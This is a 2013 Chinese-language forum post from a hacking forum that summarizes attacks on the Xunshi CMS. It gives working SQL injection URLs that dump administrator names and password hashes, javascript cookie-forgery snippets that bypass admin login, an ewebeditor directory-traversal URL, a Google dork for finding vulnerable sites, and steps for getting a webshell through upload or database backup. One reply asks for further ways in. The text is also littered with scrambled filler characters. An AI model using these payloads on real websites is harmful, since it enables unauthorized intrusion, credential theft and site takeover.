中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]
作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘* w5 P- h# [6 }6 L

! A7 q/ e' i, f0 K在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)* h3 `% ]7 b, `- P
% N* S7 Y  I; e/ x& Q8 ~$ b
以下本文总结来自黑防去年第9期杂志上的内容...
, r$ q  B% w. B$ O- z
% C  P) o# U, D2 \% @7 F2 Q先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
8 s% @* ^4 f  j. z1 Y9 h* L4 R
. @. A, j+ R; Z; n26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
$ z2 h; t; G% }. k1 k+ \  b0 H; o4 d9 M; y0 M1 i
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
: u+ f3 R/ a- q9 g9 G, j2 I这里一个注入
7 b' c7 }4 ]6 u
: y  f6 d- q/ O  _4 N* C效果如图:
6 M& p5 {% u/ k5 j2 g5 H  q% a- l
) l6 H& z$ t  j* R% r0 |3 y3 ~ 3 S! c: P7 q3 ~- g7 o7 u

* Y. Q1 L2 [: w这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
! v2 g5 U0 T% ]- Y' s6 L
* z$ ~, y) H7 U: b# L9 Y密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
' ^% K" j- r5 z7 c, Q) L2 u+ z! i* S; Z2 b6 D/ o3 D- G: n
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));  Z% s. M- ^  f0 I6 ]
* K( |* m7 w+ l- }
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
1 Q/ e5 q) [" \) f
/ d4 L! W7 _) x% \: K因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞( R9 A/ u8 C) o2 H, l( w) E
2 B+ R- p4 B2 |4 H3 w
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
. a8 x/ e  H" d) o# @2 l1 c# N
' |2 @1 a; \% b& f访问这页面来列目录..步骤如下:' M, b5 q- C1 r& }( E
, O$ M* Y' _2 R2 C: k
javascript:alert(document.cookie="admindj=1") 8 E7 [: ~: r) D& }( |% q+ v

0 g1 i% ^4 z: y7 J0 \) Bhttp://www.political-security.co ... asp?id=46&dir=../.." K1 L. I' M$ t8 F) X% G' K$ G
7 d8 F- c) j8 n+ F. `4 s
效果如图:1 Z$ v/ H# G) _5 Y9 S$ ?
0 w+ s. y! s" ]0 j( R8 M" a# W& N: T

) o7 V$ }3 e  ]( z. p9 L" H% |& v+ }5 T" O7 O6 k) K
这样全站目录都能瞧了..找到后台目录..进去..
' f! t/ p/ A. ^& w  Z: b
8 Q# Q" W2 H: A3 l+ T那么进了后台怎么拿shell??上传--备份就ok了..
4 e2 b" l. E) N. h
( _; [) v% k0 h+ L那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
% _4 w- L9 W. }' ]7 I7 Y. ?/ n$ r2 K( f6 h/ z4 d& {
这个我也碰到过一次..你都可以通过列目录来实现..
9 u0 V3 D7 V: O
7 S5 ~* x4 z  gjavascript:alert(document.cookie="admindj=1")
8 N3 E8 k/ F/ ~+ o1 n6 N8 b" J( R, M
http://www.political-security.co ... p?action=BackupData
- j# ~. Z5 D% m& U4 J! x' l  j; B2 V7 T
备份ok.." J/ e$ q! E6 R; c- b, [7 k
( ~, T- f3 m! j2 g$ P) w
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?# F+ N4 Y9 X: [. v, D$ d) N/ R
. y) O& y! Z3 C$ V
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下* P6 J% V5 Z$ N$ k' j6 e
5 G* }6 g% k- V: M, S9 C: Y5 M
然后访问此页面进行注入..步骤如下:: Z, l3 {' G3 ?# K7 W6 g0 t4 O

* E- F. e5 ?9 n6 R$ f+ z  Sjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
" B) f) Z$ Z- T5 `8 c3 ^4 K: N0 g2 a
, U$ O0 f: @% v& {3 T然后请求admin/admin_chk.asp页面9 J& r! ~7 Q+ N
7 ^& X- U% v! E, t' w: P/ @  l6 V
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%, `6 q6 g& H, x4 m: x9 }* C
! }0 J& p6 m& t9 t
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
4 `' v: h2 Q$ z0 E" ?0 k- q% s3 h4 f5 y
效果如图所示:
+ P3 k  M/ h! g- c3 D& _
0 {4 d  g$ {8 H& t . a* S, g3 l- h. ]  S; a6 R

0 D' o& ~3 _: K# u4 ]: H讯时漏洞2
0 q( m/ }# w8 Z6 \7 ygoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
( I; L3 c+ M) v! R6 i: r
5 [/ H( k1 B) n4 I5 v) e* z3 f# R1、/admin/admin_news_pl_view.asp?id=1
( W7 r) ~) H* u' G* @! H//id任意 填入以下语句
9 v" D3 l' l5 {4 d" H ) D4 n1 x/ m/ W3 O- s
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!  O5 O$ u- P* ], t
  q' J5 @5 d4 K1 D  g/ N% X6 T

. X) `4 y/ \# r8 R( c7 a' w
  h( Y8 ?( f0 s3 ^0 X' p" Z% s3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
" G- c' \5 G# }" g8 b & i' ~* M( l4 p2 h

9 J$ k6 z5 V; I: Q2 Z
/ V& U% U1 `' w- ]0 a! I- K* Y爆出管理员帐号和密码了
, F  X; b/ q# C2 o+ ~6 z% f* d3 b
# N4 d# o' u+ c' p) C
4 s8 I0 J$ R" i6 v5 k& @$ E8 s% k
( M3 _- W# j) {1 w" q) P4、cookies进后台" r* ]7 m! s" y. X( h5 r7 F

# l& r' I, A1 Z* E* u, Gjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));+ D5 H- |/ f2 b4 y  A, H& c

6 Z9 ]: K9 s2 G  M. c$ \( N: o
% y4 ~6 K; ~7 `# r+ |( S
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
4 `5 D* g( O- i& K4 N+ t9 [ 3 o1 r1 X! d( v; k

* {* }. q+ `, |) R# U
. G5 i& S/ g5 [$ X# l9 B6、后台有上传和备份取SHELL不难。
- }5 g+ H0 r* E0 K * m) y3 n/ z) H& e( a+ p8 O% [; i
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
6 X7 {4 w9 K5 y ) v$ K( w1 f, d' R) J; y
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
& i6 H4 t7 U& t5 d
" l1 _% x9 R$ @' I9 R' s2 u: j( k2 e+ r& V9 I+ T
; _# U% r" X. q" L. d3 D




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2